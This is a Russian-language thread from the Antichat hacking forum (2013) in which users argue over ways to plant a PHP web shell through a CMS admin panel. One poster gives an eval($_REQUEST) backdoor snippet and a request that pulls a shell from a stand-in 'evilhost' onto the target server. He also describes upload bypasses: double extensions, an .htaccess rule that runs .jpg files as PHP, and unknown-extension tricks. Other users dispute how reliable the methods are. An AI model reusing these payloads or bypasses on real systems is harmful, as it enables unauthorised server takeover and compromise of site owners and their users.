ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

30.12.2013, 00:24
|
|
Постоянный
Регистрация: 11.03.2013
Сообщений: 354
Провел на форуме: 97570
Репутация:
267
|
|
Уважаемый ТС, хочу обратить Ваше внимание на одну мелочь - Варианты есть всегда (с)
Что за движок?
можно попробовать вставить php код с бекдором:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]php
[/COLOR][COLOR="#007700"]eval([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]@[/COLOR][/COLOR]
Смотрим абсолютный путь:
Код HTML:
localhost/?e=phpinfo();
Льем шелл:
Код HTML:
yoursite.com/news/1.html?e=copy("evilhost/shell.txt","/home/yoursite/shell.php");
Это в свое время сработало на PHPShop CMS, кстати не так давно....
Это как вариант номер раз)
Вариант номер 2.1:
Можно попробовать залить вместо картинки файл shell.php.jpg , допустим обработчик переименует его в 12312312312.php.jpg - это может прокатить, при определенных конфигах сервера....
Вариант 2.2:
Также можно попробовать залить shell.jpg
Предварительно залив .htaccess следующего содержания:
Код HTML:
AddType application/x-httpd-php .jpg
Тогда сервер будет обрабатывать .jpg файлы как приложение php и переименованный шелл с новым названием 123123123123.jpg отработает как пых файл)
Вариант 2.3:
Попробуй залить файл shell.php.g1f или shell.php.ololo
файл shell.php .ololo имеет неизвестный формат, т.к. апачу не знакомо расширение .ololo он начнет обрабатывать наш шелл как PHP файл.
PS а вообще, я уверен, что это далеко не все способы которые можно попробовать заливаясь из админки...
|
|
|

30.12.2013, 15:09
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
умники собрались
Тake_IT
"@php
eval($_REQUEST[e]);
php@ "
ты где встречал такие теги "@php php@" ?
если в каком то темплейт двиге оно используется как пхп тег это не значит что оно везде будет работать.
тс сказал что залить можно картинки, с чего ты взял что можно загрузить хтакцесс?
"12312312312.php.jpg - это может прокатить, при определенных конфигах сервера...."
ага, определенные конфиги, какой даун админ будет настроить сервер на обработку jpeg как php
такие методы могут сработать в конкретных двигах, но в общем случай писать о них как о методах заливки шелла это глупо.
|
|
|

30.12.2013, 22:58
|
|
Постоянный
Регистрация: 11.03.2013
Сообщений: 354
Провел на форуме: 97570
Репутация:
267
|
|
Сообщение от Konqi
умники собрались
[offtop]Раньше ты попроще был)) [/offtop]
Сообщение от Konqi
"@php
eval($_REQUEST[e]);
php@ "
ты где встречал такие теги "@php php@" ?
если в каком то темплейт двиге оно используется как пхп тег это не значит что оно везде будет работать.
эти теги я встречал минимум в 3 движках phpshop cms , Instant Update CMS, Blox CMS, могу еще вспомнить....
Сообщение от Konqi
тс сказал что залить можно картинки, с чего ты взял что можно загрузить хтакцесс?
учитывая то, что ТС совсем зеленый, я предположил что он может не совсем правильно описывать ситуацию, в частности, с загрузкой файлов. поэтому решил напомнить про несколько несложных методов)
Сообщение от Konqi
"12312312312.php.jpg - это может прокатить, при определенных конфигах сервера...."
ага, определенные конфиги, какой даун админ будет настроить сервер на обработку jpeg как php
такие методы могут сработать в конкретных двигах
, но в общем случай писать о них как о методах заливки шелла это глупо.
случаев когда файлы .php.gif запускаются - масса, на моей памяти это примерно 15-20%
в конкретных двигах говорите?) а мы знаем с каким двигом столкнулся ТС ? а вдруг это тот самый, "конкретный"??
PS мне кажется от твоего совета было бы больше проку, чем от критики)
|
|
|

31.12.2013, 05:06
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от Take_IT
[offtop]Раньше ты попроще был)) [/offtop]
а ты наверное с другого акка сидел.
PS мне кажется от твоего совета было бы больше проку, чем от критики)
я выше уже отписался, что если нету конкретной инфы о двиге, то не имеет смысла описать какие то левые методы которые работают с очень низкой частотой
|
|
|

31.12.2013, 11:54
|
|
Постоянный
Регистрация: 11.03.2013
Сообщений: 354
Провел на форуме: 97570
Репутация:
267
|
|
Сообщение от Konqi
я выше уже отписался, что если нету конкретной инфы о двиге, то не имеет смысла описать какие то левые методы которые работают с очень низкой частотой
ну извините бл* )) если случаев, когда .php.gif обрабатывается как пхп 15-20% (1 из 5\6 - оказывается для тебя этого мало) , то этими способами похекалось минимум половина всех CMS которые я изучал)) а ты говоришь про низкую частоту...
PS ага, пароль потерял, давно не заходил сюда)
|
|
|

31.12.2013, 14:49
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от Take_IT
ну извините бл* )) если случаев, когда .php.gif обрабатывается как пхп 15-20% (1 из 5\6 - оказывается для тебя этого мало) , то этими способами похекалось минимум половина всех CMS которые я изучал)) а ты говоришь про низкую частоту...
PS ага, пароль потерял, давно не заходил сюда)
Бред пишешь. Если " .php.gif обрабатывается как пхп 15-20%" это всего лишь означает, что эти 20% были похеканы кем-то ранее. Ни одна нормальная CMS (без бэкдоров), ни один адекватный админ (не обкуренный) не позволит выполняться картинкам как пхп-код.
Что-то прям из научной фантастики. Я согласен ещё на .ololo с натяжкой - да, встречается. Но вышепредложенное - вообще бред чистой воды.
З.Ы. А залейте вообще *.txt. Вдруг выполнится как php? Ну а вдруг?
|
|
|

31.12.2013, 17:36
|
|
Постоянный
Регистрация: 11.03.2013
Сообщений: 354
Провел на форуме: 97570
Репутация:
267
|
|
опачки! одепты подтянулись)))
Ох, ну ничего себе кто меня учить собрался))))
Сообщение от BigBear
Бред пишешь. Если " .php.gif обрабатывается как пхп 15-20%" это всего лишь означает, что эти 20% были похеканы кем-то ранее. Ни одна нормальная CMS (без бэкдоров), ни один адекватный админ (не обкуренный) не позволит выполняться картинкам как пхп-код.
да я и не утверждаю что нормальный человек так настроит сервер суть не в том из за чего это работает(админ дурак или серв похекали раньше), суть в том, что это работает(фактически) и с достаточно большой вероятностью, пусть это будет даже 1 сервер из 10...
А про то, как в нормальных CMS появляются бекдоры, я расскажу немного позже) как раз снял видео на эту тему
Сообщение от BigBear
Что-то прям из научной фантастики. Я согласен ещё на .ololo с натяжкой - да, встречается. Но вышепредложенное - вообще бред чистой воды.
с натяжкой?) а объясни почему это сработает не всегда и почему вообще работает?)
file.php.ololo имеет неизвестное для апача расширение .ololo поэтому он будет обрабатывать file.php.ololo точно также как и file.php. а знаешь почему?? потому, что в случае если апач встречает файл с незнакомым расширением он начинает искать знакомое расширение с конца имени файла, т.е. фактически, если бы мы залили file.php.txt.ololo он бы выполнился как . txt. А не сработает это в том случае, если в дире куда льем файл не выполняется пых
Зы вам че, квестики перестали делать?)) плохо, мозги как и мышцы надо тренировать))) И кстати, если для тебя вышеописанное фантастика, почитай хоть темы роа за 2009-2011 года, помнится там было много примеров)
Сообщение от BigBear
З.Ы. А залейте вообще *.txt. Вдруг выполнится как php? Ну а вдруг?
троллинг не засчитан, тренируйтесь лучше на кошках (с)
|
|
|

31.12.2013, 17:44
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от Take_IT
file.php.ololo
имеет неизвестное для апача расширение .ololo поэтому он будет обрабатывать
file.php.ololo
точно также как и
file.php

|
|
|

31.12.2013, 17:55
|
|
Постоянный
Регистрация: 11.03.2013
Сообщений: 354
Провел на форуме: 97570
Репутация:
267
|
|
пардон, я не говорю что от этого нет никакой защиты и это работает в 100%, но ведь на локалке, в искусственных условиях, можно добиться самого разного результата и сделать что угодно)
|
|
|

31.12.2013, 18:00
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме: 0
Репутация:
0
|
|
Какие там требования чтоб file.php.unknown_extension выполнялся как .php напомните пожалуйста.
mod_mime enabled кажется, и что-то ещё видимо. У меня на локалке mod_mime вроде стоит, а код не выполняется.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|